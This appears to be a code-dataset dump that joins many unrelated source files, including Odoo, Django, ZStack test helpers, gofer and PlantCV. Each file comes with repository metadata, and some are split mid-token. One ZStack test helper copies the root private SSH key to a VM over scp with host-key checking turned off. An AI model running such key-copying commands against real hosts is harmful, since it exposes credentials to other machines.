'name': fields.char('OBI', required=True, help="Originator to Beneficiary Information"),
'code': fields.char('Code', size=64, required=True),
'parent_id': fields.many2one('account.bank.statement.line.global', 'Parent Code', ondelete='cascade'),
'child_ids': fields.one2many('account.bank.statement.line.global', 'parent_id', 'Child Codes', copy=True),
'type': fields.selection([
('iso20022', 'ISO 20022'),
('coda', 'CODA'),
('manual', 'Manual'),
], 'Type', required=True),
'amount': fields.float('Amount', digits_compute=dp.get_precision('Account')),
'bank_statement_line_ids': fields.one2many('account.bank.statement.line', 'globalisation_id', 'Bank Statement Lines'),
}
_rec_name = 'code'
_defaults = {
'code': lambda s,c,u,ctx={}: s.pool.get('ir.sequence').next_by_code(c, u, 'account.bank.statement.line.global'),
'name': '/',
}
_sql_constraints = [
('code_uniq', 'unique (code)', 'The code must be unique !'),
]
def name_search(self, cr, user, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args = []
ids = []
if name:
ids = self.search(cr, user, [('code', 'ilike', name)] + args, limit=limit)
if not ids:
ids = self.search(cr, user, [('name', operator, name)] + args, limit=limit)
if not ids and len(name.split()) >= 2:
#Separating code and name for searching
operand1, operand2 = name.split(' ', 1) #name can contain spaces
ids = self.search(cr, user, [('code', 'like', operand1), ('name', operator, operand2)] + args, limit=limit)
else:
ids = self.search(cr, user, args, context=context, limit=limit)
return self.name_get(cr, user, ids, context=context)
class account_bank_statement_line(osv.osv):
_inherit = 'account.bank.statement.line'
_columns = {
'val_date': fields.date('Value Date', states={'confirm': [('readonly', True)]}),
'globalisation_id': fields.many2one('account.bank.statement.line.global', 'Globalisation ID',
states={'confirm': [('readonly', True)]},
help="Code to identify transactions belonging to the same globalisation level within a batch payment"),
'globalisation_amount': fields.related('globalisation_id', 'amount', type='float',
relation='account.bank.statement.line.global', string='Glob. Amount', readonly=True),
'state': fields.selection([('draft', 'Draft'), ('confirm', 'Confirmed')],
'Status', required=True, readonly=True, copy=False),
'counterparty_name': fields.char('Counterparty Name', size=35),
'counterparty_bic': fields.char('Counterparty BIC', size=11),
'counterparty_number': fields.char('Counterparty Number', size=34),
'counterparty_currency': fields.char('Counterparty Currency', size=3),
}
_defaults = {
'state': 'draft',
}
def unlink(self, cr, uid, ids, context=None):
if context is None:
context = {}
if context.get('block_statement_line_delete', False):
raise UserError(_('Delete operation not allowed. Please go to the associated bank statement in order to delete and/or modify bank statement line.'))
return super(account_bank_statement_line, self).unlink(cr, uid, ids, context=context)
|
xperienced/flask-rest-boilerplate
|
config/development.py
|
Python
|
mit
| 63
| 0.015873
|
DEBUG = True
SQL
|
ALCHEMY_DATABASE_URI = 'sqlite:////tmp/t
|
est.db'
|
jpartogi/django-job-board
|
job_board/templatetags/tag_list.py
|
Python
|
bsd-3-clause
| 1,058
| 0.017013
|
from django.template import Library, Node, Variable, VariableDoesNotExist
from django.core.urlresolvers import reverse
from job_board.views import job_list_by_tag
register = Library()
def do_populate_tags(pa
|
rser,token):
"""
render a list of tags, with it's link.
the token is tag.
Arguments:
- `parser`:
- `token`:
"""
bits = token.split_contents()
print bits
return PopulateTagsNode(bits[1])
class Po
|
pulateTagsNode(Node):
def __init__(self,tag):
self.tag_tag = Variable(tag)
def render(self,context):
try:
_tag = self.tag_tag.resolve(context)
_font_size = _tag.font_size + 10
_font_weight = min(900,(300 + (_tag.font_size*100)))
_url = reverse(job_list_by_tag, kwargs = {'tag_name' : _tag.name } )
return "<span style='font-size:%spx;font-weight:%s'><a href='%s'>%s</a></span>" % (_font_size,_font_weight,_url,_tag.name)
except VariableDoesNotExist:
return ''
register.tag('populate_tag', do_populate_tags)
|
kmee/odoo-brazil-hr
|
l10n_br_resource/__openerp__.py
|
Python
|
agpl-3.0
| 854
| 0
|
# -*- coding: utf-8 -*-
# Copyright 2016 KMEE
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
{
'name': 'L10n Br Resource',
'summary': """
This module extend core resource to create important brazilian
informations. Define a Brazilian calendar and some tools to compute
dates used in financial and payroll modules""",
'version': '8.0.1.0.0',
'license': 'AGPL-3',
'author': 'KMEE,Odoo Community Association (OCA)',
'website': 'www.odoobrasil.org.br',
'depends': [
'l10n_br_base',
'resource',
],
'external_dependencies': {
'python': ['pybrasil'],
},
'data': [
'view
|
s/resource_calendar.xml',
'views/resource_calendar_leaves.xml',
'views/menu_resource_calendar.xml',
'wizard/workalendar_holiday_impo
|
rt.xml',
],
}
|
zstackio/zstack-woodpecker
|
integrationtest/vm/virt_plus/test_stub.py
|
Python
|
apache-2.0
| 33,035
| 0.007083
|
'''
Create an unified test_stub to share test operations
@author: Youyk
'''
import os
import subprocess
import time
import uuid
import zstacklib.utils.ssh as ssh
import zstacklib.utils.jsonobject as jsonobject
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.zstack_test.zstack_test_vm as zstack_vm_header
import zstackwoodpecker.zstack_test.zstack_test_volume as zstack_volume_header
import zstackwoodpecker.zstack_test.zstack_test_eip as zstack_eip_header
import zstackwoodpecker.zstack_test.zstack_test_vip as zstack_vip_header
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.vm_operations as vm_ops
test_file = '/tmp/test.img'
TEST_TIME = 120
def check_icmp_connection_to_public_ip(vm1, pub_ip='223.5.5.5', expected_result='PASS'):
vm1_inv = vm1.get_vm()
if expected_result is 'PASS':
test_lib.lib_check_ping(vm1_inv, pub_ip)
elif expected_result is 'FAIL':
with test_lib.expected_failure("ping from vm1 to public ", Exception):
test_lib.lib_check_ping(vm1_inv, pub_ip)
else:
test_util.test_fail('The expected result should either PASS or FAIL')
def create_vlan_vm_with_volume(l3_name=None, disk_offering_uuids=None, disk_number=None, session_uuid = None):
if not disk_offering_uuids:
disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('smallDiskOfferingName'))
disk_offering_uuids = [disk_offering.uuid]
if disk_number:
for i in range(disk_number - 1):
disk_offering_uuids.append(disk_offering.uuid)
return create_vlan_vm(l3_name, disk_offering_uuids, \
session_uuid = session_uuid)
def create_vlan_vm(l3_name=None, disk_offering_uuids=None, system_tags=None, session_uuid = None, instance_offering_uuid = None):
image_name = os.environ.get('imageName_net')
if not l3_name:
l3_name = os.environ.get('l3VlanNetworkName1')
return create_vm('vlan_vm', image_name, l3_name, \
disk_offering_uuids=disk_offering_uuids, system_tags=system_tags, \
instance_offering_uuid = instance_offering_uuid,
session_uuid = session_uuid)
def create_vm(vm_name='virt-vm', \
image_name = None, \
l3_name = None, \
instance_offering_uuid = None, \
host_uuid = None, \
disk_offering_uuids=None, system_tags=None, rootVolumeSystemTags=None, session_uuid = None):
if not image_name:
image_name = os.environ.get('imageName_net')
if not l3_name:
l3_name = os.environ.get('l3PublicNetworkName')
vm_creation_option = test_util.VmOption()
image_uuid = test_lib.lib_get_image_by_name(image_name).uuid
l3_names = l3_name.split(',')
print 'shuang: %s' % (l3_names)
l3_net_uuids = []
for l3_n in l3_names:
l3_net_uuid = test_lib.lib_get_l3_by_name(l3_n).uuid
l3_net_uuids.append(l3_net_uuid)
if not instance_offering_uuid:
instance_offering_name = os.environ.get('instanceOfferingName_s')
instance_offering_uuid = test_lib.lib_get_instance_offering_by_name(instance_offering_name).uuid
vm_creation_option.set_l3_uuids(l3_net_uuids)
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_instance_offering_uuid(instance_offering_uuid)
vm_creation_option.set_name(vm_name)
vm_creation_option.set_system_tags(system_tags)
vm_creation_option.set_data_disk_uuids(disk_offering_uuids)
if rootVolumeSystemTags:
vm_creation_option.set_rootVolume_systemTags(rootVolumeSystemTags)
if host_uuid:
vm_creation_option.set_host_uuid(host_uuid)
vm = zstack_vm_header.ZstackTestVm()
vm.set_creation_option(vm_creation_option)
vm.create()
return vm
def create_volume(volume_creation_option=None, session_uuid = None):
if not volume_creation_option:
disk_offering = test_lib.lib_get_disk_offering_by_name(os.environ.get('smallDiskOfferingName'))
volume_creation_option = test_util.VolumeOption()
volume_creation_option.set_disk_offering_uuid(disk_offering.uuid)
volume_creation_option.set_name('vr_test_volume')
volume_creation_option.set_session_uuid(session_uuid)
volume = zstack_volume_header.ZstackTestVolume()
volume.set_creation_option(volume_creation_option)
volume.create()
return volume
def make_ssh_no_password(vm_inv):
vm_ip = vm_inv.vmNics[0].ip
ssh.make_ssh_no_password(vm_ip, test_lib.lib_get_vm_username(vm_inv), \
test_lib.lib_get_vm_password(vm_inv))
def execute_shell_in_process(cmd, timeout=10, logfd=None):
if not logfd:
process = subprocess.Popen(cmd,
|
executable='/bin/sh', shell=True, universal_newlines=True)
else:
process = subprocess.Popen(cmd, executable='/bin/sh', shell=True, stdout=logfd, stderr=logfd, universal_newlines=True)
start_time = time.time()
while process.poll() is None:
curr_time = time.time()
TEST_TIME = curr_time - start_time
if TEST_TIME > timeout:
proce
|
ss.kill()
test_util.test_logger('[shell:] %s timeout ' % cmd)
return False
time.sleep(1)
test_util.test_logger('[shell:] %s is finished.' % cmd)
return process.returncode
def create_test_file(vm_inv, bandwidth):
'''
the bandwidth is for calculate the test file size,
since the test time should be finished in 60s.
bandwidth unit is KB.
'''
vm_ip = vm_inv.vmNics[0].ip
file_size = bandwidth * TEST_TIME
seek_size = file_size / 1024 - 1
timeout = 10
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
cmd = '%s "dd if=/dev/zero of=%s bs=1M count=1 seek=%d"' \
% (ssh_cmd, test_file, seek_size)
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('test file is not created')
def copy_key_file(vm_inv):
vm_ip = vm_inv.vmNics[0].ip
cmd = 'scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null /root/.ssh/id_rsa %s:/root/.ssh/id_rsa' % vm_ip
timeout = 10
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('test file is not created')
def copy_pub_key_file(vm_inv):
vm_ip = vm_inv.vmNics[0].ip
cmd = 'scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null /root/.ssh/id_rsa.pub %s:/root/.ssh/id_rsa.pub' % vm_ip
timeout = 10
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('test pub key file is not created')
def test_scp_vm_outbound_speed(vm_inv, bandwidth, raise_exception = True):
'''
bandwidth unit is KB
'''
timeout = TEST_TIME + 30
vm_ip = vm_inv.vmNics[0].ip
cmd = 'scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s:%s /dev/null' \
% (vm_ip, test_file)
start_time = time.time()
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('scp test file failed')
end_time = time.time()
scp_time = end_time - start_time
if scp_time < TEST_TIME:
if not raise_exception:
test_util.test_logger('network outbound QOS test file failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not effect. ' % (scp_time, TEST_TIME, bandwidth))
return False
test_util.test_fail('network outbound QOS test file failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not effect. ' % (scp_time, TEST_TIME, bandwidth))
else:
test_util.test_logger('network outbound QOS test file pass, since the scp time: %d is bigger than the expected test time: %d. It means the bandwidth limitation: %d KB/s is effect. ' % (scp_time, TEST_TIME, bandwidth))
return True
def
|
rockstor/rockstor-core
|
src/rockstor/smart_manager/views/cpu_util.py
|
Python
|
gpl-3.0
| 963
| 0
|
"""
Copyright (c) 2012-2020 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
|
"""
from smart_manager.models import CPUMetric
from smart_manager.serializers import CPUMetricSerializer
from generic_sprobe import GenericSProbeView
class CPUMetricView(GenericSProbeView):
serializer_class = CPUMetricSerializer
model_obj = CPUMetric
|
pgrimaud/django-pokedex
|
pokemon/views.py
|
Python
|
mit
| 616
| 0.008117
|
from django.template import Context, loader
from pokemon.models import Pokemon
from django.http import HttpResponse
from django.http import Http404
|
def index(request):
Pokemons = Pokemon.objects.all().order_by('id_pokemon')
t = loader.get_template('pokemon/index.html')
c = Context({
|
'Pokemons': Pokemons,
})
return HttpResponse(t.render(c))
def pokemon(request, id):
try:
Pkmn = Pokemon.objects.get(id_pokemon=id)
except Pokemon.DoesNotExist:
raise Http404
return HttpResponse(loader.get_template('pokemon/pokemon.html').render(Context({'Pokemon': Pkmn,})))
|
splice/gofer
|
src/gofer/metrics.py
|
Python
|
lgpl-2.1
| 1,728
| 0.004051
|
#
# Copyright (c) 2011 Red Hat, Inc.
#
# This software is licensed to you under the GNU Lesser General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (LGPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, o
|
r FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of LGPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/lgpl-2.0.txt.
#
# Jeff Ortel <[email protected]>
#
"""
The I{metrics} module defines classes and other resources
designed for collecting and reporting performance metrics.
"""
import time
from math import modf
class Timer:
def __init__(self, started=0, stopped=0):
self.started = started
|
self.stopped = stopped
def start(self):
self.started = time.time()
self.stopped = 0
return self
def stop(self):
if self.started > 0:
self.stopped = time.time()
return self
def duration(self):
return ( self.stopped - self.started )
def __str__(self):
if self.started == 0:
return 'not-running'
if self.started > 0 and self.stopped == 0:
return 'started: %d (running)' % self.started
duration = self.duration()
jmod = ( lambda m : (m[1], m[0]*1000) )
if duration < 1:
ms = (duration*1000)
return '%d (ms)' % ms
if duration < 60:
m = modf(duration)
return '%d.%.3d (seconds)' % jmod(m)
m = modf(duration/60)
return '%d.%.3d (minutes)' % jmod(m)
|
bmmalone/pymisc-utils
|
pyllars/__init__.py
|
Python
|
mit
| 76
| 0
|
__version_info__ = ('1', '0', '0')
__version__ = '.'.join(__version_info__)
| ||
cinepost/Copperfield_FX
|
copper/cop/cop_comps.py
|
Python
|
unlicense
| 2,456
| 0.041938
|
from copper.cop.cop_node import CopNode
import pyopencl as cl
import numpy
from PIL import Image
class COP2_Comp_Add(CopNode):
'''
This filter adds foreground over background using OpenCL
'''
type_name = "add"
category = "comps"
def __init__(self, engine, parent):
super(CLC_Comp_Add, self).__init__(engine, parent)
self.program = engine.load_program("comp_add.cl")
self.__inputs__ = [None, None]
self.__input_names__ = ["Input 1","Input 2"]
def compute(self):
self.width, self.height = self.input(0).size
self.devOutBuffer = cl.Image(self.engine.ctx, self.engine.mf.READ_WRITE, self.image_format, shape=(self.width, self.height))
sampler = cl.Sampler(self.engine.ctx,
True, # Normalized coordinates
cl.addressing_mode.CLAMP_TO_EDGE,
cl.filter_mode.LINEAR)
exec_evt = self.program.run_add(self.engine.queue, self.size, None,
self.input(0).getOutDevBuffer(),
self.input(1).getOutDevBuffer(),
self.devOutBuffer,
sampler,
numpy.int32(self.width),
numpy.int32(self.height),
)
exec_evt.wait()
class COP2_Comp_Blend(CopNode):
'''
This filter blends foreground over backg
|
round using OpenCL
'''
type_name = "blend"
category = "comps"
def __init__(self, engine, parent):
super(CLC_Comp_Blend, self).__init__(engine, parent)
|
self.program = engine.load_program("comp_blend.cl")
self.__inputs__ = [None, None]
self.__input_names__ = ["Input 1","Input 2"]
self.addParameter("factor", float, 0.5)
def bypass_node(self):
factor = self.parm("factor").evalAsFloat()
if factor <= 0.0:
self.log("Bypassing with node %s at input 0" % (self.input(0).path()))
return self.input(0)
if factor >= 1.0:
self.log("Bypassing with node %s at input 1" % (self.input(1).path()))
return self.input(1)
return None
def compute(self):
self.width, self.height = self.input(0).size
self.devOutBuffer = cl.Image(self.engine.ctx, self.engine.mf.READ_WRITE, self.image_format, shape=(self.width, self.height))
sampler = cl.Sampler(self.engine.ctx,
True, # Normalized coordinates
cl.addressing_mode.CLAMP_TO_EDGE,
cl.filter_mode.LINEAR)
exec_evt = self.program.run_blend(self.engine.queue, self.size, None,
self.input(0).getOutDevBuffer(),
self.input(1).getOutDevBuffer(),
self.devOutBuffer,
sampler,
numpy.int32(self.width),
numpy.int32(self.height),
numpy.float32(self.parm("factor").evalAsFloat())
)
exec_evt.wait()
|
shishaochen/TensorFlow-0.8-Win
|
tensorflow/contrib/learn/python/learn/estimators/__init__.py
|
Python
|
apache-2.0
| 1,777
| 0.00619
|
"""Scikit Flow Estimators."""
# Copyright 2015-present The Scikit Flow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.learn.python.learn.estimators.base import TensorFlowEstimator, TensorFlowBaseTransformer
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowLinearClassifier
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowClassifier
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowLinearRegressor
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowRegressor
from tensorflow.contrib.learn.python.learn.estimators.dnn import TensorFlowDNNClassifier
from tensorflow.contrib.learn.python.learn.estimators.dnn import TensorFlowDNNRegressor
from tensorflow.contrib.learn.python.learn.estimators.rnn import TensorFlowRNNCl
|
assifier
from tensorflow.contrib.learn.python.learn.estimators.rnn import TensorFlowRNNRegressor
from tensorflow.contrib.learn.python.learn.estimators.autoencoder import TensorFlowDNNAutoencoder
from tensorflow.contrib.learn.python.learn.estimators.run_con
|
fig import RunConfig
|
codelab-mx/edi-translator
|
data_mining/forms.py
|
Python
|
gpl-3.0
| 193
| 0.036269
|
from django import forms
from models import edi_address
class DocumentForm(forms.ModelForm):
docfile = forms.FileField(
|
)
|
class Meta:
model = edi_address
fields = ["docfile",]
|
bmazin/ARCONS-pipeline
|
examples/Pal2012-crab/enhancementPhaseP1.py
|
Python
|
gpl-2.0
| 21,133
| 0.022903
|
from matplotlib import rcParams, rc
from spuriousRadioProbRangeP1 import
|
probsOfGRP
from util import mpfit
from util.fitFunctions import gaussian
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
import scipy.stats
import tables
import scipy.special
def fitGauss(xdata,ydata,yerr,flatLine=False):
nBins=100
amplitude = .5*np.max(ydata)
x_offset = xdata[np.argmax(ydata)]
sigma = (np.max(xdata)-np.min(xdata))/10.
y_offset = 3.
fixed = [False]*4
if
|
flatLine == True:
amplitude = 0
fixed[0:3] = [True]*3
params=[sigma, x_offset, amplitude, y_offset] # First guess at fit params
errs = yerr
errs[np.where(errs == 0.)] = 1.
quiet = True
parinfo = [ {'n':0,'value':params[0],'limits':[.0001, .1], 'limited':[True,True],'fixed':fixed[0],'parname':"Sigma",'error':0},
{'n':1,'value':params[1],'limits':[x_offset-sigma*3, x_offset+sigma*3],'limited':[True,True],'fixed':fixed[1],'parname':"x offset",'error':0},
{'n':2,'value':params[2],'limits':[.2*amplitude, 3.*amplitude],'limited':[True,True],'fixed':fixed[2],'parname':"Amplitude",'error':0},
{'n':3,'value':params[3],'limited':[False,False],'fixed':fixed[3],'parname':"y_offset",'error':0}]
fa = {'x':xdata,'y':ydata,'err':yerr}
m = mpfit.mpfit(gaussian, functkw=fa, parinfo=parinfo, maxiter=1000, quiet=quiet)
if m.status <= 0:
print m.status, m.errmsg
mpp = m.params #The fit params
mpperr = m.perror
for k,p in enumerate(mpp):
parinfo[k]['value'] = p
parinfo[k]['error'] = mpperr[k]
#print parinfo[k]['parname'],p," +/- ",mpperr[j]
if k==0: sigma = p
if k==1: x_offset = p
if k==2: amplitude = p
if k==3: y_offset = p
fineXdata = np.linspace(np.min(xdata),np.max(xdata),100.)
gaussfit = y_offset + amplitude * np.exp( - (( xdata - x_offset)**2) / ( 2. * (sigma**2)))
fineGaussFit = y_offset + amplitude * np.exp( - (( fineXdata - x_offset)**2) / ( 2. * (sigma**2)))
resolution = np.abs(x_offset/(2.355*sigma))
return {'gaussfit':gaussfit,'resolution':resolution,'sigma':sigma,'x_offset':x_offset,'amplitude':amplitude,'y_offset':y_offset,'fineXdata':fineXdata,'fineGaussFit':fineGaussFit,'parinfo':parinfo}
# common setup for matplotlib
params = {'savefig.dpi': 300, # save figures to 300 dpi
'axes.labelsize': 14,
'lines.linewidth': 1.5,
'text.fontsize': 14,
'legend.fontsize': 14,
'xtick.labelsize': 14,
'ytick.major.pad': 6,
'xtick.major.pad': 6,
'ytick.labelsize': 14}
# use of Sans Serif also in math mode
rc('text.latex', preamble='\usepackage{sfmath}')
rcParams.update(params)
phaseShift = 1.-0.677001953125#found with findOpticalPeak.py
def align_yaxis(ax1, v1, ax2, v2):
"""
adjust ax2 ylimit so that v2 in ax2 is aligned to v1 in ax1
Taken from http://stackoverflow.com/questions/10481990/matplotlib-axis-with-two-scales-shared-origin
"""
_, y1 = ax1.transData.transform((0, v1))
_, y2 = ax2.transData.transform((0, v2))
inv = ax2.transData.inverted()
_, dy = inv.transform((0, 0)) - inv.transform((0, y1-y2))
miny, maxy = ax2.get_ylim()
ax2.set_ylim(miny+dy, maxy+dy)
def indexToPhase(indices):
radioIndexOffset = 0.5#Guppi offset, found as shift in unrotated,rotated radio profiles
radioArrivalPhases = (indices+radioIndexOffset)/2048.+phaseShift
return radioArrivalPhases
def nSigma(pvalue):
return scipy.special.erfinv(pvalue)*np.sqrt(2.)
np.seterr(divide='ignore')
np.set_printoptions(threshold=np.nan)
path = '/Scratch/dataProcessing/crabData2/'
nIdxToCheck = 81
nSigmaRadioCutoff = 3
nBins = 250
bUseFineIndexBins = False
bInterpulses = False
#dataFilePath = path+'indPulseProfiles_{}sigma_{}_{}phaseBins_swap.h5'.format(nSigmaRadioCutoff,nIdxToCheck,nBins)
dataFilePath = path+'indPulseProfiles_{}sigma_P1_KS.h5'.format(nSigmaRadioCutoff)
dataFile = tables.openFile(dataFilePath,mode='r')
radioMax = dataFile.root.radioMax.read()
counts = dataFile.root.counts.read()#-dataFile.root.skyCounts.read()
giantPulseNumbers = dataFile.root.giantPulseNumbers.read()
pulseNumberTable = dataFile.root.pulseNumberTable.read()
giantPulseNumberMask = dataFile.root.giantPulseNumberMask.read()
idxOffsets = dataFile.root.idxOffsets.read()
indProfiles = dataFile.root.indProfiles.read()
radioIndices = dataFile.root.radioIndices.read()
overlapPNs = np.load('overlapP1.npz')['overlap']
mainPulseMask = np.logical_not(np.in1d(giantPulseNumbers,overlapPNs))
#mainPulseMask = np.logical_not(mainPulseMask)
radioMax = radioMax[mainPulseMask]
counts = counts[mainPulseMask]
giantPulseNumbers = giantPulseNumbers[mainPulseMask]
pulseNumberTable = pulseNumberTable[mainPulseMask]
giantPulseNumberMask = giantPulseNumberMask[mainPulseMask]
indProfiles = indProfiles[mainPulseMask]
radioIndices = radioIndices[mainPulseMask]
#radioIndexBins=np.array([1369,1371,1373,1375,1378,1381,1385,1389,1395])-.5
#radioIndexBinsFine = np.arange(1369,1396)-.5
radioIndexBins = np.arange(143,179,1)-.5
radioIndexBinsFine = np.arange(143,179)-.5
if bUseFineIndexBins == True:#For statistical test, use fine binning, for figure, use coarse
radioIndexBins = radioIndexBinsFine
startRadioIndex = radioIndexBins[0]
endRadioIndex = radioIndexBins[-1]
probDict = probsOfGRP(startPeakIndex=startRadioIndex,endPeakIndex=endRadioIndex)
probPhaseBins = probDict['radioPhaseBins']
probPeakDist = probDict['peakDist']
#a mask for less good data, during bright or dim times
dimMask = np.ones(len(counts))
idx0 = np.searchsorted(idxOffsets,0)
dimMask[counts[:,idx0]==0]=0
lineCounts = np.mean(counts,axis=1)
meanLineCounts = np.mean(lineCounts[lineCounts!=0])
stdLineCounts = np.std(lineCounts[lineCounts!=0])
stdPercentCutoff=0.
upperCutoff = scipy.stats.scoreatpercentile(lineCounts,100.-stdPercentCutoff)
lowerCutoff = scipy.stats.scoreatpercentile(lineCounts,stdPercentCutoff)
dimMask[lineCounts>upperCutoff] = 0
dimMask[lineCounts<lowerCutoff] = 0
dimMask = (dimMask==1)
radioStrength = radioMax
indProfilesMask = np.tile(giantPulseNumberMask,(np.shape(indProfiles)[2],1,1))
indProfilesMask = np.swapaxes(indProfilesMask,0,2)
indProfilesMask = np.swapaxes(indProfilesMask,0,1)
indProfilesMasked = np.ma.array(indProfiles,mask=indProfilesMask)
nIdxOffsets = len(idxOffsets)
#sum over GRP index, to get number of nonzero pulses in each index
# this will be used to scale later
nPulsesPerIdx = np.array(np.sum(giantPulseNumberMask,axis=0),dtype=np.double).reshape((-1,1))
cmap = matplotlib.cm.jet
histStart = 0.
histEnd = 1.
nBins=np.shape(indProfiles)[2]
_,phaseBinEdges = np.histogram(np.array([0]),range=(histStart,histEnd),bins=nBins)
phaseBinEdges+=phaseShift
phaseBinCenters = phaseBinEdges[0:-1]+np.diff(phaseBinEdges)/2.
grpProfile = np.ma.mean(indProfilesMasked.data[:,idx0],axis=0)
peakIdx = np.argmax(grpProfile)
peakBins = range(peakIdx-1,peakIdx+2)
print 'opticalPeakPhaseBins',peakBins
nRadioBins=15
radioStrengthCutoff = .155#0.155
radioCutoffMask = radioStrength >= radioStrengthCutoff
strongMask = np.logical_and(radioCutoffMask,dimMask)
#finalMask = np.logical_and(strongMask,radioPeakMask)
radioPhaseMask = np.logical_and(radioIndices >= 143,radioIndices <= 178)
#radioPhaseMask = np.logical_and(radioIndices >= np.min(radioIndices),radioIndices <= np.max(radioIndices))
finalMask = np.logical_and(strongMask,radioPhaseMask)
print 'GRP above',radioStrengthCutoff,':',np.sum(finalMask),'and in phase range'
#counts color plot
fig = plt.figure()
ax = fig.add_subplot(111)
handleMatshow = ax.matshow(counts[finalMask])
ax.set_aspect(1.0*np.shape(counts[finalMask])[1]/np.shape(counts[finalMask])[0])
fig.colorbar(handleMatshow)
overallCoincidentProfile = np.mean(indProfiles[finalMask,idx0,:],axis=0)
surroundingProfiles = np.ma.mean(indProfilesMasked[finalMask,:],axis=0)
avgProfile = np.ma.mean(surroundingProfiles,axis=0)
minProfileIndex = np.argmin(avgProfile)
#for the sky level take an average over 5 points at the lowest part of the period
skyLevel = np.mean(avgProfile[minProfileIndex-3:minProfileIndex
|
google/mirandum
|
alerts/main/migrations/0020_recentactivity.py
|
Python
|
apache-2.0
| 895
| 0.002235
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('main', '0019_auto_20170521_1332'),
]
operations = [
migrations.CreateModel(
name='RecentActivity',
f
|
ields=[
|
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('timestamp', models.DateTimeField()),
('type', models.CharField(max_length=255, choices=[(b'follow', b'Followers/Subscribers'), (b'support', b'Recurring Support')])),
('data', models.TextField()),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
),
]
|
danforthcenter/plantcv
|
tests/plantcv/visualize/test_auto_threshold_methods.py
|
Python
|
mit
| 558
| 0
|
import pytest
import cv2
from plantcv.plantcv.visualize import auto_threshold_methods
def test_auto_threshold_methods_bad_input(visualize_test_data):
"""Test for PlantCV."""
img = cv2.imread(visualize_test_data.small_rgb_img)
with pytest.ra
|
ises(RuntimeError):
_ = auto_threshold_methods(gray_img=img)
def test_auto_threshold_methods(visualize_test_data):
"""Test for PlantCV."""
img = cv2.imread(visualize_test_data.small_
|
gray_img, -1)
labeled_imgs = auto_threshold_methods(gray_img=img)
assert len(labeled_imgs) == 5
|
jortel/gofer
|
test/unit/messaging/adapter/test_url.py
|
Python
|
lgpl-2.1
| 4,053
| 0.000247
|
# Copyright (c) 2014 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (GPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of GPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
from unittest import TestCase
from gofer.messaging.adapter.url import URL
from gofer.messaging.adapter.url import PORT, Scheme
class Test(object):
def __init__(self,
url,
adapter=None,
scheme=None,
host=None,
port=None,
userid=None,
password=None,
path=None):
self.url = url
self.adapter = adapter
self.scheme = scheme
self.host = host
self.port = port
self.userid = userid
self.password = password
self.path = path
def __call__(self, test):
url = URL(self.url)
test.assertEqual(url.adapter, self.adapter)
test.assertEqual(url.scheme, self.scheme)
test.assertEqual(url.host, self.host)
test.assertEqual(url.port, self.port)
test.assertEqual(url.userid, self.userid)
test.assertEqual(url.password, self.
|
password)
test.assertEqual(url.path, self.path)
TESTS = [
Test('qpid+amqp://elmer:fudd@blue:5000/all',
adapter='qpid',
scheme='amqp',
host='blue',
port=5000,
userid='elmer',
password='fudd',
path='all'),
Test('amq
|
p://elmer:fudd@yellow:1234//',
scheme='amqp',
host='yellow',
port=1234,
userid='elmer',
password='fudd',
path='/'),
